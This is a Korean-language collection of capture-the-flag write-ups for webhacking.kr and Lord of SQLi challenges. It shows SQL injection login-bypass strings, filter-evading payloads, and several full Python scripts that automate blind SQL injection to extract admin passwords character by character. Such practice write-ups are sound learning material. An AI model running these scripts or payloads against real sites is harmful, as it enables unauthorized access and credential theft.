no에 0||no=2를 입력하고 로그인하자 다음과같이 admin계정의 비밀번호를 입력하라고 나온다.
이젠 admin계정의 비밀번호를 BlindSQLi를 통해서 알아내면 된다.
먼저 비밀번호의 길이를 알아내기 위해서 no에 다음과 같은 문구를 삽입해 길이를 알아낸다.
1||no=2&&length(pw)=1
위와 같은 비밀번호를 입력하라는 창이 나올때까지 1부터 증가하면서 대입해본다.
그결과 10을 삽입했을때 비밀번호를 입력하라고 나온다. 따라서 비밀번호의 길이는 10이라는것을 알수 있다.
그 다음 실제 비밀번호를 알아내기 위해서 다음과 같은 파이썬 코드를 작성해 프로그램으로 돌려보았다.
import requests
url = 'https://webhacking.kr/challenge/web-29/' #url 주소를 입력
cookies = {'PHPSESSID':''} #세션 쿠키를 입력
db_len = 10
def find_db_str(db_len):
db_str = ""
for len in range(1,db_len+1):
for ascii in range(33,127):
k = hex(ascii).split("0x")[1]
value = "?no=0||substr(pw,{},1)=0x{}&id=guest&pw=guest".format(len,k)
# no에 Payload 코드 삽입
response = requests.get(url + value, cookies=cookies) # GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "admin password" in response.text:
db_str+=chr(ascii) #참이라면 ascii코드를 char형으로 변경해서 저장
break
return db_str #한 문자에 대한 검색이 끝날시 엔터 처리
if __name__ == '__main__':
print("db : \n"+find_db_str(db_len))
프로그램을 돌리면 위와같이 비밀번호가 lck_admin이라고 출력된다.
하지만 실제 비밀번호는 luck_admin인데 2번째 글자인 u가 출력되지 않은 이유는 guest계정의 비밀번호인 guest의 2번째 글자가 u로 똑같기 때문이다.
red 계정으로 회원가입 후 로그인을 해보니 설정한 비밀번호가 해시화되어서 화면에 출력된다.
hash값으로 보았을 때 md5인것으로 추측된다.
해당 해시값을 md5복호화 사이트에서 복호화 해본 결과 다음과 같이 나온다.
복호화 결과
설정한 비밀번호는 '1234' 이지만 뒤에 apple이 같이 출력되는것으로 보아 apple은 salt값으로 추측된다.
salt란 보안강화를 위해 비밀번호 뒤에 임의의 문자를 덧붙이는 것이다.
그럼 이제 admin계정으로 로그인 우회를 하기 위해 공격을 시도해보겠다.
참인 결과
admin' or '1'='1# 구문을 대입해 공격을 시도해보니 로그인이 되지는 않지만 위와같은 화면이 출력된다.
거짓인 결과
admin' and '1'='1# 구문을 대입해 공격을 시도해보니 위와같은 화면이 출력된다.
따라서, 참일경우 Wron password 구문이 출력되고, 거짓일 경우 Login Fail 이 출력되므로 참/거짓이 다르게 출력된다.
이러한 경우 우리는 Blind SQLi를 시도해볼 수 있다.
프록시 도구를 이용해 먼저 로그인 요청시 어떤 파라미터가 전송되는지를 다음과 같이 먼저 확인한다.
로그인 요청 시 uuid, pw 파라미터가 POST 방식으로 전달되는것을 확인할 수 있다.
위 정보들을 바탕으로 자동화 공격을 시도할 파이썬 코드를 작성한다.
파이썬 코드
import requests
url = 'https://webhacking.kr/challenge/bonus-2/index.php' #url 주소를 입력
cookies = {'PHPSESSID':''} #세션 쿠키를 입력
def find_pw_len():
pw_len = 0
while 1:
pw_len = pw_len+1
value = "admin' and length(pw) = {}#".format(pw_len) #반복하면서 pw의 글자수를 비교하는 Payload 코드 작성
params = {'uuid': value} # uuid에 Payload 코드 삽입
response = requests.post(url, data=params, cookies=cookies) #POST를 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Wrong" in response.text:
break
return pw_len #pw 길이 반환
def find_pw_str(pw_len):
pw_str = ""
for len in range(1,pw_len+1):
for ascii in range(33,127):
value = "admin' and (ascii(substring(pw,{},1))>{})#".format(len,ascii) # 반복하면서 pw를 substring 한다음 ascii로 변환한 값을 통해 비교해서 정답을 찾아냄
params = {'uuid': value} # uuid에 Payload 코드 삽입
response = requests.post(url, data=params, cookies=cookies) # POST를 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Fail" in response.text:
pw_str+=chr(ascii) #참이라면 ascii코드를 char형으로 변경해서 저장
break
return pw_str #한 문자에 대한 검색이 끝날시 엔터 처리
if __name__ == '__main__':
print("비밀번호 : \n"+find_pw_str(find_pw_len()))
위 코드를 실행시키면 다음과 같이 해시화된 비밀번호를 알 수 있다.
실제 비밀번호를 알아내기 위해서 해시값을 아까와 같이 복호화 한다.
복호화를 해본 결과 wowapple 이라는 실제 비밀번호가 출력된다.
하지만 apple은 salt값이니 제외하고 실제 비밀번호는 wow이다.
이제 필요한것을 다 얻었으니 굳이 로그인 우회가 아니라 그냥 비밀번호를 치고 들어가면 된다.
import requests
url = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php' #url 주소를 입력
cookies = {'PHPSESSID': 'cookie'} #세션 쿠키를 입력
def find_pw_len():
pw_len = 0
while 1:
pw_len=pw_len+1
value = " \"\" or id like \"admin\" and length(pw) like {} #".format(pw_len) #반복하면서 pw의 글자수를 비교하는 Payload 코드 작성
params = {'no': value} # no에 Payload 코드 삽입
response = requests.get(url,params=params, cookies=cookies) #GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Hello admin" in response.text:
break
return pw_len #pw 길이 반환
def find_pw_str(pw_len):
pw_str = ""
for len in range(1,pw_len+1):
for ascii in range(33,127):
value = " \"\" or id like \"admin\" and ord(mid(pw,{},1)) like {} #".format(len,ascii) # 반복하면서 pw를 substring 한다음 ascii로 변환한 값을 통해 비교해서 정답을 찾아냄
params = {'no': value} # no에 Payload 코드 삽입
response = requests.get(url, params=params, cookies=cookies) # GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Hello admin" in response.text:
pw_str+=chr(ascii)+":" #참이라면 ascii코드를 char형으로 변경해서 저장
pw_str+="\n"
return pw_str #한 문자에 대한 검색이 끝날시 엔터 처리
if __name__ == '__main__':
print("비밀번호 조합 : \n"+find_pw_str(find_pw_len()))
or,and,substr,= 이렇게 SQLi에서 많이 쓰이는 문자 4가지 정도가 필터링이 걸려있다
위 문자들을 우회해서 자동화 도구를 사용하면 비밀번호를 알아낼 수 있다
2) 문제 풀이
방법은 다음과 같다
먼저 우회한 페이로드를 작성하여 자동화도구에 페이로드 코드부분을 수정한다
그 다음 실제pw를 알아내서 공격을 시도한다
2-1 비밀번호의 길이를 알아내는 python코드
import requests
url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php' #url 주소를 입력
cookies = {'PHPSESSID': 'cookie'} #세션 쿠키를 입력
def find_pw_len():
pw_len = 0
while 1:
pw_len=pw_len+1
value = "' || id like 'admin' && length(pw) like {} #".format(pw_len) #반복하면서 pw의 글자수를 비교하는 Payload 코드 작성
params = {"pw": value} # pw에 Payload 코드 삽입
response = requests.get(url,params=params, cookies=cookies) #GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Hello admin" in response.text:
break
return pw_len #pw 길이 반환
if __name__ == '__main__':
print("pw의 길이는 : "+str(find_pw_len()))
2-2 실제 비밀번호를 알아내는 python코드
import requests
url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php' #url 주소를 입력
cookies = {'PHPSESSID': 'cookie'} #세션 쿠키를 입력
def find_pw_len():
pw_len = 0
while 1:
pw_len=pw_len+1
value = "' || id like 'admin' && length(pw) like {} #".format(pw_len) #반복하면서 pw의 글자수를 비교하는 Payload 코드 작성
params = {'pw': value} # pw에 Payload 코드 삽입
response = requests.get(url,params=params, cookies=cookies) #GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Hello admin" in response.text:
break
return pw_len #id 길이 반환
def find_pw_str(pw_len):
pw_str = ""
for len in range(1,pw_len+1):
for ascii in range(0,127): #ascii a~z까지의 값 반복
value = "' || ascii(substring(pw,{},1)) like {} #".format(len,ascii) # 반복하면서 pw를 substring 한다음 ascii로 변환한 값을 통해 비교해서 정답을 찾아냄
params = {'pw': value} # pw에 Payload 코드 삽입
response = requests.get(url, params=params, cookies=cookies) # GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Hello admin" in response.text:
pw_str+=chr(ascii)+":" #참이라면 ascii코드를 char형으로 변경해서 저장
pw_str+="\n"
return pw_str #한 문자에 대한 검색이 끝날시 엔터 처리
if __name__ == '__main__':
print("비밀번호 조합 : \n"+find_pw_str(find_pw_len()))
이번문제는 바로 직전에 풀었던 "darkelf"문제와 blind SQLi문제였던"orc"문제의 조합 버전이라고 생각하면 된다
blind SQLi문제지만 or,and 문자가 필터링이 되어 공격쿼리를 짤때 이부분만 우회하여 자동화도구에 대입시키면된다
2) 문제 풀이
방법은 다음과 같다
먼저 pw의 길이를 자동화도구를 사용하여 알아낸다
그 다음 실제 pw를 자동화도구를 사용하여 알아낸 뒤 공격을 시도한다
2-1 비밀번호의 길이를 알아내는 python코드
import requests
url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php' #url 주소를 입력
cookies = {'PHPSESSID': 'cookie'} #세션 쿠키를 입력
def find_pw_len():
pw_len = 0
while 1:
pw_len=pw_len+1
value = "' || id='admin' && length(pw) = {} -- '".format(pw_len) #반복하면서 pw의 글자수를 비교하는 Payload 코드 작성
params = {"pw": value} # pw에 Payload 코드 삽입
response = requests.get(url,params=params, cookies=cookies) #GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Hello admin" in response.text:
break
return pw_len #id 길이 반환
if __name__ == '__main__':
print("pw의 길이는 : "+str(find_pw_len()))
2-2 실제 비밀번호를 알아내는 python 코드
import requests
url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php' #url 주소를 입력
cookies = {'PHPSESSID': ''} #세션 쿠키를 입력
def find_pw_len():
pw_len = 0
while 1:
pw_len=pw_len+1
value = "' || id = 'admin' && length(pw) = {} -- '".format(pw_len) #반복하면서 pw의 글자수를 비교하는 Payload 코드 작성
params = {'pw': value} # pw에 Payload 코드 삽입
response = requests.get(url,params=params, cookies=cookies) #GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Hello admin" in response.text:
break
return pw_len #pw 길이 반환
def find_pw_str(pw_len):
pw_str = ""
for len in range(1,pw_len+1):
for ascii in range(0,127): #ascii a~z까지의 값 반복
value = "' || ascii(substring(pw,{},1)) = {} -- '".format(len,ascii) # 반복하면서 pw을 substring 한다음 ascii로 변환한 값을 통해 비교해서 정답을 찾아냄
params = {'pw': value} # pw에 Payload 코드 삽입
response = requests.get(url, params=params, cookies=cookies) # GET을 통해 전달
print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
print(value) # 전달되는 Payload 코드 확인
if "Hello admin" in response.text: #
pw_str+=chr(ascii)+":" #참이라면 ascii코드를 char형으로 변경해서 저장
pw_str+="\n"
return pw_str #한 문자에 대한 검색이 끝날시 엔터 처리
if __name__ == '__main__':
print("비밀번호 조합 : \n"+find_pw_str(find_pw_len()))
비밀번호의 길이를 알아내는 공격화면실제 비밀번호를 알아내는 공격화면
자동화도구를 통해 실제 비밀번호가 7b751aec 인것을 알아낼 수 있다
공격 시 삽입 구문: pw=' || id=admin && pw=7b751aec
공격 후 구문: https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=admin%20&&%20pw=7b751aec
공격을 수행하면 결과적으로 SQL쿼리문에 다음과 같이공격 시 삽입 구문이 대입되므로 공격이 성공한다.
select id from prob_orge where id='guest' and pw='7b751aec'
